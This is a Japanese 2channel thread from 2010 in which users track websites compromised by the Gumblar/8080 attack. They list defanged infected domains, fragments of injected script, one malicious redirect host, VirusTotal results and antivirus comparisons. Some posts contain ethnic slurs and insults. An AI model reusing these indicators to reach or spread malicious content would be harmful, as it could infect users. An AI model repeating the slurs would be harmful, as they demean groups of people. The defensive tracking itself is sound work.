108 :名無しさん@お腹いっぱい。:2010/04/26(月) 01:03:17
してない

109 :名無しさん@お腹いっぱい。:2010/04/26(月) 01:04:52
してる

110 :名無しさん@お腹いっぱい。:2010/04/26(月) 01:05:47
してますん

111 :名無しさん@お腹いっぱい。:2010/04/26(月) 01:13:32
セキュ板の各アンチウイルススレって、なんでああも荒れてるの?
ゲハ脳みたい

112 :名無しさん@お腹いっぱい。:2010/04/26(月) 01:19:54
荒らしてるのは数人だろ
同じ気違いがずっと騒いでるだけ

113 :名無しさん@お腹いっぱい。:2010/04/26(月) 01:19:57
ID出ない分変なの居着きやすいんでしょ
NGワードで対処出来ないスレはハナから見ない、これで解決

114 :コテハン ◆8080adndqg :2010/04/26(月) 11:48:39
【陥落サイトのURL悪用厳禁】
pre21●jp/
ソースの中央付近
</SCRIPT><SCRIPT>var t;if・・・(.at:)
※定位置(最下部)には.info:のやつ

otokudou●h01●jp ←<!--<script>-->で絶賛無効化中

115 :名無しさん@お腹いっぱい。:2010/04/26(月) 14:21:39
朝日オート系列は何回感染してんだ
パスワード変えてないのか?

116 :名無しさん@お腹いっぱい。:2010/04/26(月) 16:45:58
バスターの公式サイトがガンブラーで改ざんされたりしたら面白そうだな
過去にも一回やらかしてるだけにもう一回やらかしたらユーザー激減しそうw

117 :名無しさん@お腹いっぱい。:2010/04/26(月) 17:28:20
それをネタとして流せないあたりが何とも

118 :名無しさん@お腹いっぱい。:2010/04/26(月) 17:57:26
そういう面白いことはESETとかウィルスセキュリティにやってもらいたいんだが

119 :名無しさん@お腹いっぱい。:2010/04/26(月) 19:28:13
改ざんならesetもやられたじゃん

120 :名無しさん@お腹いっぱい。:2010/04/26(月) 19:34:47
なた低レベルなやつが増えてきたな

121 :名無しさん@お腹いっぱい。:2010/04/26(月) 19:59:46
                 ___ ,,、
            ,  ' ´    /;;;;ヘ`丶
           /       〈;;;;;;;;;;;;ヘ  \
           /_____  \;;;;;;;;;ヘ   \
        〈'´  ____\_.>''´ ̄\    ',
           \/...:::::::::::::___:/    , -、j   〉   /\
        < ̄.::::::::;:> ' {   }      {、;;;;;\┬'  /.  \
       ,≦::::;  ' ´    , ゝ-夂i不丁::::::\;;;;;\__ /::::..   \
      >'´     ,. イ/  |:/イ乙i |::::::::::::::\;;;;〈/;;;::::::::::..   \
     /      , イN|i}    辷ソノ:::::::::::::::::::iヽ/;;;;;;;;;;::::::::::....    \
     \    ≦:::::::::八.ヒ!、   /.:::::::::::/:::::::| \;;;;;;;;;;;;;;;::::::::::..   \
      \   `<:__;ゝ―‐<::::::::::::; イl:::::::::i   \;;;;;;;;;;;;;;;::::::::::...    \
.         \   /:::/       ヾニニニニヽ;::::::〉    \;;;;;;;;;;;;;;;;:::::::::...   \
          ヽ、|::::|          \     ̄`丶    \;;;;;;;;;;;;;;;;;::::::::..     \
                |::::|                 \    \;;;;;;;;;;;;;;;;;::::::::..    \
             ̄\                     \     \;;;;;;;;;;;;;;;;;;;:::::::...   \_____
                    ヽ ____          /  \     \;;;;;;;;;;;;,;;;;;;:::::::...       /
                    ,.イ    ヽ        i      \     \;;;;,;;;;;;;;;;;;;;;:::::::...   /
                   /:::{               ト、    .......ヽ     \;;;;;;;;;;;;;,;;;;;;;::::::::/

122 :名無しさん@お腹いっぱい。:2010/04/26(月) 20:29:57
キモイもん貼るなっての

123 :名無しさん@お腹いっぱい。:2010/04/26(月) 20:59:10
なたなら仕方がない

124 :名無しさん@お腹いっぱい。:2010/04/26(月) 21:01:12
どうしてこうなた

125 :名無しさん@お腹いっぱい。:2010/04/26(月) 22:38:34
なったなたにしてやんよ!

ところでケイダッシュ公式が再開してるようだが
http://www.aguse.jp/?m=w&url=www.kdash.jp&x=19&y=4
http://www.aguse.jp/?m=w&url=www.kdashstage.jp&x=37&y=21

126 :名無しさん@お腹いっぱい。:2010/04/26(月) 22:52:02
なたでここ

>>125
上はまだ ぁぅぁぅぁー
http://tsushima.2ch.net/test/read.cgi/news/1272180292/329

127 :名無しさん@お腹いっぱい。:2010/04/26(月) 22:55:38
>>126
な(んてこっ)た
aguseGWで覗いて正解だった…危ない危ない

128 :名無しさん@お腹いっぱい。:2010/04/26(月) 23:03:42
>>125
http://www.virustotal.com/jp/analisis/d40d160a5bdeaa667f8081a869c632a45ff8a6b5e94d8c2b67a586c570ef1559-1272289861

ケイダッシュとpre21●jp/に連日凸したが
奴等は電話を切りやがった
人としておかしい
流石三国人w

129 :名無しさん@お腹いっぱい。:2010/04/27(火) 02:18:58
ところで
やっぱりセキュリティベンダーって信頼に関わるから自社の公式サイトとか配布するツール等は命かけて安全確保してるの?

130 :名無しさん@お腹いっぱい。:2010/04/27(火) 08:39:45
最近はどこのメーカーも電子署名してるから、電子署名がないようなexeは踏まない

131 :名無しさん@お腹いっぱい。:2010/04/27(火) 08:44:59
>>115
トロイが仕掛けられたクライアントで更新してるから、いくらやってもまた改変されるとかじゃないの?

>>116
さすがにセキュリティー企業なら、インターネットからだれてもコンテンツ更新とか無理じゃねーの?

Webデザイン企業には、CMSとかにしかアクセスできないようにして、
メインサーバへの更新は社員が社内からやってるんじゃね?

132 :名無しさん@お腹いっぱい。:2010/04/27(火) 10:21:53
>>92
リンク先読みって火狐でググッただけで感染するのか?コードまで実行しちゃうの?ノートントラップの類じゃないのか

133 :62:2010/04/27(火) 10:34:47
ケイダッシュはまだprototype.jsが感染してるわけだが、一生このままじゃね?
スカイリンクとかいう会社もケイダッシュもカス。カスが。春日。

134 :名無しさん@お腹いっぱい。:2010/04/27(火) 11:58:37
誰かが投げたの
http://www.virustotal.com/analisis/65340fefe2ab5d28642c5431a20781f0bd89b3a089802bbb9f77c212dcabb460-1272305909
File www.kdash.jp_common_js_prototype. received on 2010.04.26 18:18:29 (UTC)
Result: 7/40 (17.50%)
Avast 4.8.1351.0 2010.04.26 JS:Illredir-AX
Avast5 5.0.332.0 2010.04.26 JS:Illredir-AX
BitDefender 7.2 2010.04.26 Trojan.JS.Agent.EAL
DrWeb 5.0.2.03300 2010.04.26 JS.Redirector.based.2
F-Secure 9.0.15370.0 2010.04.26 Trojan.JS.Agent.EAL
GData 21 2010.04.26 Trojan.JS.Agent.EAL
nProtect 2010-04-26.01 2010.04.26 Trojan.JS.Agent.EAL

さっき漏れが投げたの
http://www.virustotal.com/analisis/65340fefe2ab5d28642c5431a20781f0bd89b3a089802bbb9f77c212dcabb460-1272336600
File prototype.js received on 2010.04.27 02:50:00 (UTC)
Result: 9/41 (21.96%)
a-squared 4.5.0.50 2010.04.27 Trojan.JS.Agent!IK
Avast 4.8.1351.0 2010.04.26 JS:Illredir-AX
Avast5 5.0.332.0 2010.04.26 JS:Illredir-AX
BitDefender 7.2 2010.04.27 Trojan.JS.Agent.EAL
DrWeb 5.0.2.03300 2010.04.27 JS.Redirector.based.2
F-Secure 9.0.15370.0 2010.04.26 Trojan.JS.Agent.EAL
GData 21 2010.04.27 Trojan.JS.Agent.EAL
Ikarus T3.1.1.80.0 2010.04.27 Trojan.JS.Agent
nProtect 2010-04-26.01 2010.04.26 Trojan.JS.Agent.EAL

>>133
状況を理解してないのかも。

135 :名無しさん@お腹いっぱい。:2010/04/27(火) 12:08:20
>>57
まちがえんな、カス

136 :名無しさん@お腹いっぱい。:2010/04/27(火) 12:09:06
管理者に抜き打ちセキュリティテストとかやってもいいと思うんだ

137 :名無しさん@お腹いっぱい。:2010/04/27(火) 13:03:47
自分でしないと...

138 :名無しさん@お腹いっぱい。:2010/04/27(火) 13:46:39
>>133
Last-Modified: Tue, 27 Apr 2010 04:43:37 GMT : common/js/prototype.js
なおたよ。

139 :名無しさん@お腹いっぱい。:2010/04/27(火) 15:47:23
>>133
キャッシュぐらい消せカスが

140 :名無しさん@お腹いっぱい。:2010/04/27(火) 16:51:12
ケイダッシュはどうせまた再改ざんくるだろ

141 :名無しさん@お腹いっぱい。:2010/04/27(火) 18:05:53
>>130
電子署名ない.exe踏まないとか
フリーソフト殆ど使えないじゃん

142 :名無しさん@お腹いっぱい。:2010/04/27(火) 18:26:21
>>141
インスコ不要なソフト(zip解凍で使えるようなやつ)なら
exeとdllあたりをVirusTotalに投げればだいたいわかるだろ

143 :名無しさん@お腹いっぱい。:2010/04/27(火) 18:28:39
それだと>>130と矛盾する

144 :62:2010/04/27(火) 19:44:13
>>139
Google先生のチェッカー使いましたが何か?

そして相変わらず告知無し。こんだけ言われてるのに無視とか新し過ぎる。
メッセサンオー以上だぜ

145 :名無しさん@お腹いっぱい。:2010/04/27(火) 20:02:32
>>142
>>143が言ってるように>>130はexe踏まない=使わないと言ってる件・・・

146 :名無しさん@お腹いっぱい。:2010/04/27(火) 20:10:28
>>134
avastとBitDefender以外のフリーものは駄目だね

147 :名無しさん@お腹いっぱい。:2010/04/27(火) 20:23:58
>>146
bitのフリーは常駐監視ないからGumblar/8080から守れないだろ

148 :名無しさん@お腹いっぱい。:2010/04/27(火) 21:03:37
aguseとgredと>>91のチェッカーで問題なしなら
そのサイトは安全と見ていいのかな?

149 :名無しさん@お腹いっぱい。:2010/04/27(火) 21:06:45
>>57
IPアドレスの鯖缶:惑星さんからお返事北。

> We appreciate you bringing this matter to our attention. This issue is currently being investigated. Due to privacy policies, we will most likely not be able to provide you with details regarding the outcome of our investigation.

なんて書いてあるのかよくわかんない。。。orz....
日本語でつーほーしたのがいかんかったのかにゃ。

150 :名無しさん@お腹いっぱい。:2010/04/27(火) 21:10:38
>>148
安全と断定はできない。
目安程度で過信は禁物。

ガンブラー以外にも脅威はあるし。

151 :名無しさん@お腹いっぱい。:2010/04/27(火) 21:11:49
>>149
通報ありがとうね
この件は現在調査中だよ
だけどプライバシーの問題で詳細は明かせないよ

って感じ

152 :149:2010/04/27(火) 21:13:23
>>151
dd
(゚ν゚)ニホンゴムズカスィネー  だったろうなぁ。

153 :名無しさん@お腹いっぱい。:2010/04/27(火) 21:13:54
ありがとよ
今から調べちゃる
結果は知らせねぇけどな

154 :149:2010/04/27(火) 21:17:26
>>153
これまたdd

返事がこないとこよりも いい(≧∇≦)b

ぐぐるせーふぶらうじんぐとノートン先生のせーふうぇぶつけたのがよかったのかも。

155 :名無しさん@お腹いっぱい。:2010/04/27(火) 21:38:29
>>144
>>139は多分>>138見て早とちりしたんだと思う。

GMTに9時間足すと日本時間JSTになるので今日の午前11時43分で>>133の1時間後に修復したってことに。

156 :名無しさん@お腹いっぱい。:2010/04/27(火) 22:12:24
>>148
aguseも最近のはスルー率高いしgredも結構スルーする
そんなもんよりとにかく>>2

157 :名無しさん@お腹いっぱい。:2010/04/27(火) 23:54:49
gredってただ乗りで検体集めまくってるのにスルーがあるんじゃ意味ねーな

158 :名無しさん@お腹いっぱい。:2010/04/28(水) 00:01:51
ところで
aguseのカスペもVTと同じで旧バージョンなのかね?

159 :名無しさん@お腹いっぱい。:2010/04/28(水) 00:11:14
「×××●pipicotts●com」が全滅っぽい

160 :名無しさん@お腹いっぱい。:2010/04/28(水) 03:24:03
マスターペニス

161 :名無しさん@お腹いっぱい。:2010/04/28(水) 09:17:23
ケイダッシュは反日創価、だからこのまま放置するよ

162 :コテハン ◆8080adndqg :2010/04/28(水) 11:45:13
【陥落サイトのURL悪用厳禁】
kimiyo-web●srv7●biz/index●html ←???
gex●sexona●net/


163 :名無しさん@お腹いっぱい。:2010/04/28(水) 12:00:51
これって証明書がカスペルスキー本家とサーバー証明書が違うということですよね?
http://up3.viploader.net/net/src/vlnet002139.jpg
だとしたら、どうやって本家の証明書を取ってきたら良いのですか?
やり方が分かりません。教えてください。

164 :名無しさん@お腹いっぱい。:2010/04/28(水) 12:29:15
スレ違いだよ馬鹿
OKwave、教えてgoo、ヤフー知恵袋にでも行って聞いてこい

165 :名無しさん@お腹いっぱい。:2010/04/28(水) 12:39:47
>>163
PC初心者
http://pc11.2ch.net/pcqa/

初心者の質問
http://gimpo.2ch.net/qa/

Kaspersky internet security Part100.カスペルスキーラボ
http://pc11.2ch.net/test/read.cgi/sec/1272339596/

166 :名無しさん@お腹いっぱい。:2010/04/28(水) 12:44:20
Windows Updateをしてるけどこれってそのまま放置でも対策してくれるの?
マカフィーフルスキャンしたけど何も出てこなかったら安心していい?

167 :163:2010/04/28(水) 12:55:30
>>163>>164
ありがとう

168 :名無しさん@お腹いっぱい。:2010/04/28(水) 16:38:12
>>166
ログくらい読めチンカス

169 :名無しさん@お腹いっぱい。:2010/04/28(水) 18:05:03
www●1a●ad-jeaayf●com

170 :名無しさん@お腹いっぱい。:2010/04/28(水) 21:43:10
すみませんがちょっと教えて。
外側からwebページを改ざんするっていうのは
どういう仕組みなの?
なにかそういうソフトがあるんですか?
自分の持ってるwebページが勝手にレイアウトが
変わっちゃったんですけど、これッて誰かのいたずら
ですかね。

171 :名無しさん@お腹いっぱい。:2010/04/28(水) 21:44:22
>>170
いたずらですめばいいけどそういうレベルで済まない場合の方が多いんじゃね
外側からではなく内側からです

172 :名無しさん@お腹いっぱい。:2010/04/28(水) 22:04:13
>>171
どういうこと?
何かウイルスに感染してるってこと?

173 :名無しさん@お腹いっぱい。:2010/04/28(水) 22:20:35
結局どのアンチウィルスソフト使えばいいんだよ
http://tsushima.2ch.net/test/read.cgi/news/1272445232/86

ν速で検体テストやってるから参加してみ。

174 :名無しさん@お腹いっぱい。:2010/04/28(水) 22:29:33
http://www.sony.jp/headphone/
DR-350USBの商品ページ入るとなんか変になるけど俺だけかな?
戻っても戻っても戻れないみたいな

スレ違いならごめん

175 :U.F.O ◆U.F.OT1DQ2 :2010/04/28(水) 23:01:46
概出だったらスマソ

http://www●rctank●jp/
ガンブラーだと思われ。

176 :名無しさん@お腹いっぱい。:2010/04/28(水) 23:05:57
>>172
その可能性がおおいにある
あとは単純なIDパスワードがアタックされて漏れたとか

>>173
スレ違い

>>174
ブラウザキャシュクリアしてみるとか

177 :名無しさん@お腹いっぱい。:2010/04/28(水) 23:08:42
ふと思ったんだけど・・・
ttp://ja.wikipedia.org/wiki/Gumblar
>マルウェアをコンピュータに感染させ、FTPアカウントを攻撃者に送信させる
これってPFWを適切に設定してあればブロックできると思うのだが
マルウェアがPFW回避行動を取るのか?

178 :名無しさん@お腹いっぱい。:2010/04/28(水) 23:10:02
>>175
さいごのとこに難読化無しでframeのが入っとるね

179 :名無しさん@お腹いっぱい。:2010/04/28(水) 23:17:15
>>177
止めちゃうんじゃね

180 :名無しさん@お腹いっぱい。:2010/04/28(水) 23:17:44
すげぇ、本当にケイダッシュ完全無視してやがる。
これがバーニング系か。
ニュースにもならんし。

181 :名無しさん@お腹いっぱい。:2010/04/28(水) 23:18:11
>>175絡みでぐぐってみたけどこれもかなあ
www●militarize●org/01.htm

一回失敗してるような感じのコードが見える

182 :U.F.O ◆U.F.OT1DQ2 :2010/04/28(水) 23:19:18
またハヶ━m9( ゚д゚)っ━ン!!

http://bentominowa●web●fc2●com/

この後にあるURLも感染を確認・・・
概出だったら土下座します。

183 :名無しさん@お腹いっぱい。:2010/04/28(水) 23:33:27
>>182
確認できないな
修正はいったかな

184 :名無しさん@お腹いっぱい。:2010/04/29(木) 00:00:08
www●xn--eckxbbj3b4kwa3fxh●jp
日本語URLうざい…

>>183
gredに仕掛けてみれ

185 :名無しさん@お腹いっぱい。:2010/04/29(木) 00:04:28
>>175
>>181
>>182
>>184

どれも確認できないのだが。

飛び先のチェック by ぴょん基地の友達
http://www.kakiko.com/check/sample.html

186 :名無しさん@お腹いっぱい。:2010/04/29(木) 00:12:55
>>184
xn--はdanさんとこで確認できた

187 :名無しさん@お腹いっぱい。:2010/04/29(木) 00:13:45
>>185
injection_graph_func.js

188 :名無しさん@お腹いっぱい。:2010/04/29(木) 00:20:19
連休で悲惨なことにならないといいが、ほんと・・・

189 :名無しさん@お腹いっぱい。:2010/04/29(木) 00:34:16
むしろ悲惨じゃない状態が想像できない

190 :名無しさん@お腹いっぱい。:2010/04/29(木) 01:17:59
www●speedchannel●co●jp/campaign/friend09/
/mobile-info/
/mobile-info/
/mobile-info/common/js/jquery●js
/mobile-info/common/js/jquery-auto●js

既出だったらごめんよ
そういや皆さま連休はどのようにお過ごしで?

191 :名無しさん@お腹いっぱい。:2010/04/29(木) 02:05:35
>>190
うんこがたくさんあるね

192 :名無しさん@お腹いっぱい。:2010/04/29(木) 03:55:06
>>182のやつ
Aguseで見ると外部と接続するオブジェクトに
helphomecare■at:8080/google■com/download■com/qip■ru■php
がある。
JSファイルの中身だけやられてるらしい。
bentominowa■web■fc2■com/index_files/kotypeb_data/injection_graph_func■js

/*LGPL*/
function E(){ で始まるやつで数字のメモがついてない



193 :名無しさん@お腹いっぱい。:2010/04/29(木) 04:04:16
<<< JPCERT/CC Alert 2010-04-28 >>>
ttp://www.jpcert.or.jp/at/2010/at100011.txt

いわゆる Gumblar ウイルスによって
ダウンロードされる DDoS 攻撃を行うマルウエアに関する注意喚起

JPCERT/CC では感染するマルウエアの中に新たに DDoS 攻撃を行うものが追加
された事を確認しました。
このマルウエアに感染すると、使用している PC が国内外の企業や組織に対
して、DDoS 攻撃を行う可能性があります。




194 :名無しさん@お腹いっぱい。:2010/04/29(木) 06:19:44
■Drive-by Downloadとも呼ばれるWebベースの攻撃からコンピュータを保護する上での有効性分析。
http://www.cascadialabs.com/clients.html#examples

   ┌── Overall(総合)30ケース
   │  ┌── In-the-Wild
   │  │  ┌── CORE IMPACT
  30 = (15) + (15)
| .100%| .100%| .100%| Norton Internet Security 2009
| . .57%| . .60%| . .53%| AVG Internet Security 8.0
| . .46%| . .60%| . .33%| McAfee Internet Security 2009
| . .37%| . .53%| . .20%| Kaspersky Internet Security 2009
| . .27%| . .40%| . .13%| Trend Micro Internet Security 2009
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

2008年9月-10月に行われた結果。
http://www.cascadialabs.com/reports/WebThreats09_Summary.pdf

195 :名無しさん@お腹いっぱい。:2010/04/29(木) 07:53:47
データが古すぎて参考にもならない…
どれもGumblarをろくに検出できないやつばっかりじゃん

196 :名無しさん@お腹いっぱい。:2010/04/29(木) 08:59:02
一般サイトがフィッシング詐欺の踏み台に、Gumblar攻撃と関係か
http://www.itmedia.co.jp/enterprise/articles/1004/27/news075.html

197 :名無しさん@お腹いっぱい。:2010/04/29(木) 09:07:55
セキュアブレインが、Twitter上で不審なURLのチェックが行えるTwitter bot「gredでチェック on Twitter」のベータ版を公開
http://www.securebrain.co.jp/about/news/2010/04/gred-bot.html


198 :名無しさん@お腹いっぱい。:2010/04/29(木) 09:08:32
>>195
最新はこちら
【AV-Testによる検出率テスト】3月分発表 マカフィーが転落
AV-TESTによる毎月恒例のウイルス検出率テストの3月分結果が発表になった。テストは今回で30回目となる。
2位と3位が入れ替わり。Symantecが2ヶ月連続でランクをあげた。McAfeeは転落した。
4位、5位、6位は先月と変わらずK7とEset、Microsoftがキープ。
Kasperskyは検出率を落とし、TrendMciroが8位に転落。
9位、10位は変わらず、AVGとRisingだった。
順位 ベンダー 検出数  検出率
# Symantec   630,754 98.46% 谷垣
# McAfee    628,906 98.18% 公明
---
# K7 Computing 616,025 96.17% 在日
# Eset Nod32  610,787 95.35% 小沢
# Microsoft   609,523 95.15% 創価
---
# Kaspersky 606,897 94.74% 鳩山
# Trend Micro 604,908 94.43% 蓮舫
# AVG    597,580 93.29% 徳之島
---
# Rising    555,879 86.78% 朝鮮人
テスト実施機関: AV-TEST.org
マルウェア総数: 640,591
(検体の内訳)
 バックドア:  85,856
 ボット:     43,658
 トロイの木馬: 407,043
 狭義のウイルス: 37,606
 ワーム:     66,428
テスト日: 2010年4月26日
テスト対象: 国内でよく知られているウイルス対策ソフト10製品(うち、MicrosoftとAVGは無料版)
*テストの対象は、国内で流通している主要ウイルス対策ソフト。なお「Microsoft」は、MSE(Microsoft Security Essentials)。

199 :名無しさん@お腹いっぱい。:2010/04/29(木) 10:49:15
>>195
>どれもGumblarをろくに検出できないやつばっかりじゃん
できるよ
Gumblarもドライブバイダウンロードだしね
スクリプト検出しないからダメなんてことはない


200 :名無しさん@お腹いっぱい。:2010/04/29(木) 11:45:47
>>170
診断して欲しいならURLかけよ

201 :名無しさん@お腹いっぱい。:2010/04/29(木) 12:55:03
>>199
ダメとまでは言わないが、攻撃の段階が進んでからじゃないと止められないってことだから
スクリプト段階で止められるものより危険性が高いんじゃないか?

202 :名無しさん@お腹いっぱい。:2010/04/29(木) 14:16:27
スクリプトを検出した→○

リダイレクト先のURLをブロックした→○

落ちてくるファイルを検出した→△(※)
※対策済の場合は何も落ちてこない

AdobeやJAVAが起動したり、HDDがゴリゴリ・・→×

○=安全
△=対策漏れ有(環境を見直すべき)
×=\(^o^)/オワタ

203 :名無しさん@お腹いっぱい。:2010/04/29(木) 14:18:44
落ちてくるファイルを検出した→○
何問題ない

204 :名無しさん@お腹いっぱい。:2010/04/29(木) 14:20:02
>>201
攻撃を受けないんだから問題ない
スクリプトだけで防御するよりずっと堅牢

205 :名無しさん@お腹いっぱい。:2010/04/29(木) 14:24:59
>>202
ダウンロードされるものも脆弱性を利用する攻撃のためのものやマルウェア本体などもある
あんまり分かってないのに不安を煽るな

206 :名無しさん@お腹いっぱい。:2010/04/29(木) 14:28:00
年末に(多分)踏んで、それ以来月一起動のうちのPCは
未だにフルスキャンかけても何も引っかからないんだが
運がいいのか悪いのか

つうか、本当に有効な8080踏んだんだろうか
実はまともに動いてない地雷だったんだろうか
こんな微妙な状況ではクリーンインスコする気になれん

207 :名無しさん@お腹いっぱい。:2010/04/29(木) 14:29:29
ノートンがドライブバイダウンロードに強いのは
スクリプトなんて検出しなくても
攻撃に使われる脆弱性を利用しようとするのを検出ブロックするから
だから初期からガンブラーも防御できた

208 :名無しさん@お腹いっぱい。:2010/04/29(木) 14:35:57
このスレも初期の頃はもっとマシな検証してたんだけど
今はスクリプト検出可否スレになってるからな

209 :名無しさん@お腹いっぱい。:2010/04/29(木) 14:38:44
つーか、対策済みであれば攻撃目的のファイルは落ちてこないし実行されないのだから
スクリプトが発見されてもされなくてもどちらでもいい。

210 :コテハン ◆8080adndqg :2010/04/29(木) 14:49:27
【陥落サイトのURL悪用厳禁】
www●hd-cre●com/ab-tz/
san●ron5●com/gbl/
marukin-gohuku●hp●infoseek●co●jp/komono/index●html


211 :名無しさん@お腹いっぱい。:2010/04/29(木) 15:28:06
感染してるサイトググったんだけど
firefoxのリンク先読み機能切ってない場合アウト?

212 :名無しさん@お腹いっぱい。:2010/04/29(木) 15:47:41
>>211
事前に>>2の対策がきちんとできていればセーフ。

213 :名無しさん@お腹いっぱい。:2010/04/29(木) 16:26:27
>>198
相変わらず信用ならんテストだなあ

ところで特に中身は無くていいからHP立ち上げて置けば自分が感染してないか指標の一つになる様な気がするんだけど
HPって立ち上げるのメンドイの?

214 :名無しさん@お腹いっぱい。:2010/04/29(木) 18:03:39
自分が感染してたら撒き散らすことになるから

215 :名無しさん@お腹いっぱい。:2010/04/29(木) 18:08:29
>>211 心配ない。
心配なら先読み機能を切る。「 firefox 先読み 無効 」でググりゃんせ。

216 :名無しさん@お腹いっぱい。:2010/04/29(木) 18:13:29
>>162
kimiyo-web●srv7だが、何か足りなくね?

217 :名無しさん@お腹いっぱい。:2010/04/29(木) 18:35:30
>>215
本当だな?心配ないんだな?信じていいんだな?

218 :215:2010/04/29(木) 18:49:23
本当は嘘です

219 :名無しさん@お腹いっぱい。:2010/04/29(木) 18:51:41
「このスレに書かれていることはすべて嘘です」

220 :名無しさん@お腹いっぱい。:2010/04/29(木) 19:03:04
狐ってそんな危なっかしい昨日がデフォで有効なのか

221 :名無しさん@お腹いっぱい。:2010/04/29(木) 19:13:03
>>206
逆にちょっとでも怪しい状況なら
さっさとクリーンインスコして不安要素を取り除いた方が精神的にいいと思うんだが

222 :名無しさん@お腹いっぱい。:2010/04/29(木) 19:39:04
>>221
データのバックアップ2年近くサボってたんだよ
今更退避しても感染してたら意味ないし
サイトは殆ど動いてないのを一つ持ってて、FFFTP使ってたけど
結局現在にいたるまで改竄の形跡はなし
でもMP3データをCからDに移すだけで、何か謎のエラー(使用中って出た。使ってねえよ)
出たりして、微妙に調子悪い
かといってHDD動きまくってるわけでも、起動が重く、遅くなってるわけでもない
カスペオンラインでも何も出てこない。WINうpだては問題なくできる
ベンダーのサイトにも繋がる

もうどこで感染判定していいのかワカンネ

223 :名無しさん@お腹いっぱい。:2010/04/29(木) 21:22:15
■Drive-by Downloadとも呼ばれるWebベースの攻撃からコンピュータを保護する上での有効性分析。
http://www.cascadialabs.com/clients.html#examples

   ┌── Overall(総合)30ケース
   │  ┌── In-the-Wild
   │  │  ┌── CORE IMPACT
  30 = (15) + (15)
| .100%| .100%| .100%| Norton Internet Security 2009
| . .57%| . .60%| . .53%| AVG Internet Security 8.0
| . .46%| . .60%| . .33%| McAfee Internet Security 2009
| . .37%| . .53%| . .20%| Kaspersky Internet Security 2009
| . .27%| . .40%| . .13%| Trend Micro Internet Security 2009
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

2008年9月-10月に行われた結果。
http://www.cascadialabs.com/reports/WebThreats09_Summary.pdf

224 :名無しさん@お腹いっぱい。:2010/04/30(金) 00:39:13
>>222
全部消してOS入れなおせばすっきり!

225 :名無しさん@お腹いっぱい。:2010/04/30(金) 01:24:02
>>222
移動出来ないMP3を救済したいのならファイルロックの解除ツールを
試してみてはどうか、UNLOCKERが便利、何にロックされてるかも判るよ
ってそういう話じゃないのか、すまない

知らない間にpre21がウイルスを駆除したっぽい、aguse、gredは反応せず
ちゃんと告知しようよ…
あと、www●kagayaki-t●co●jpがスクリプト系の何かに感染してたみたい

226 :名無しさん@お腹いっぱい。:2010/04/30(金) 01:25:59
間違えた、訂正
×告知 ○公表

227 :名無しさん@お腹いっぱい。:2010/04/30(金) 03:19:14
>>225
ゲイシのキャッシュ見たらここだぬ。
ttp://www.google.com/safebrowsing/diagnostic?hl=ja&site=myfucking%2Dpussy%2Ecom
ttp://www.siteadvisor.com/sites/myfucking-pussy.com

gnomeさんとこに紹介されてたお。
Zbotかぁ。。。

228 :名無しさん@お腹いっぱい。:2010/04/30(金) 03:22:34
>>227補足
他のキャッシュみたら難読化されてないのがあたー。。。
ttp://www.google.com/safebrowsing/diagnostic?hl=ja&site=antivirusys.ru
ttp://safeweb.norton.com/report/show?url=antivirusys.ru
ttp://www.siteadvisor.com/sites/antivirusys.ru

229 :名無しさん@お腹いっぱい。:2010/04/30(金) 03:31:01
>>228補足の補足
他にもあたー
ttp://www.google.com/safebrowsing/diagnostic?hl=ja&site=xsp.in.ua
ttp://www.google.com/safebrowsing/diagnostic?hl=ja&site=akrosi.ru

( ゚Д゚)ネムヒー

230 :名無しさん@お腹いっぱい。:2010/04/30(金) 04:01:56
>>227-229
わざわざ探してくださったのですか、ありがとうございます
Gumblar/8080系ではなかったようですね

スクリプト見ただけじゃどれがどれやらさっぱりだ…

231 :名無しさん@お腹いっぱい。:2010/04/30(金) 04:06:08
>>230
>>227はURLエンコードにゃ。

232 :名無しさん@お腹いっぱい。:2010/04/30(金) 04:12:37
>>230
ゴメンもひとつ難読化されてたの見てなかった。上のほうにあるのに…orz....
ttp://www.google.com/safebrowsing/diagnostic?hl=ja&site=personalsystemscan.cn
ttp://www.siteadvisor.com/sites/personalsystemscan.cn

233 :名無しさん@お腹いっぱい。:2010/04/30(金) 08:17:28
>>225
ありがとう。でも、移動は一応出来てるらしい
エラーメッセージとカラのフォルダが残るだけで
AdobeReaderの更新も、何故か一発でいけなかったんだよな・・・
そのままファイル移動できず・更新できず、だと諦めて初期化するか
オフライン専用機にする諦めも付くんだが・・・

>>224
すっきりしたいが、撮り貯めた写真だのなんだの大量にあるからすっきりできねえよ

234 :名無しさん@お腹いっぱい。:2010/04/30(金) 10:01:34
>>217
KatesKiller
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462

235 :名無しさん@お腹いっぱい。:2010/04/30(金) 13:05:46
ガンブラーさんは年中無休らしいです…なんか一杯出てきたorz

【陥落サイトのURL悪用厳禁】
www●m-gcomm●jp
ivisit-corp●com/company/
stargatepcmaru●com/ual0g/
deaicafe●org/hito332/
kagaden●com/reiai/ :gredでチェック入れて見ると他にも…

236 :名無しさん@お腹いっぱい。:2010/04/30(金) 13:26:56
> ivisit-corp●com/company/
これはどこに埋め込まれてるの?

237 :名無しさん@お腹いっぱい。:2010/04/30(金) 13:32:30
>>233
HDDが物理的にあやしいんでね?
バックアップ早めにしたほうがいいかも

238 :名無しさん@お腹いっぱい。:2010/04/30(金) 13:32:45
>>236
/js/rollover.js
/js/popup.js

239 :名無しさん@お腹いっぱい。:2010/04/30(金) 13:33:45
>>236
popup.js
rollover.js

240 :名無しさん@お腹いっぱい。:2010/04/30(金) 13:36:30
かぶったorz、>>238すまない

241 :名無しさん@お腹いっぱい。:2010/04/30(金) 14:01:07
>>238-239
確認できる方法は?

242 :名無しさん@お腹いっぱい。:2010/04/30(金) 14:02:37
>>241
danさんとこで見れたよ

243 :名無しさん@お腹いっぱい。:2010/04/30(金) 14:04:15
>>242追記
gredはcompanyで黒判定

244 :名無しさん@お腹いっぱい。:2010/04/30(金) 14:05:04
スクリプトが確認できないんだけど

245 :名無しさん@お腹いっぱい。:2010/04/30(金) 14:11:03
>>244
/jsのURLミスってるとおもう
gredでcompanyを見ればわかるよ

246 :名無しさん@お腹いっぱい。:2010/04/30(金) 14:21:39
>>235の続き

【陥落サイトのURL悪用厳禁】
tukaoh●com
ekisupa●visual-imp●net :GWにこれはまずくないか…?

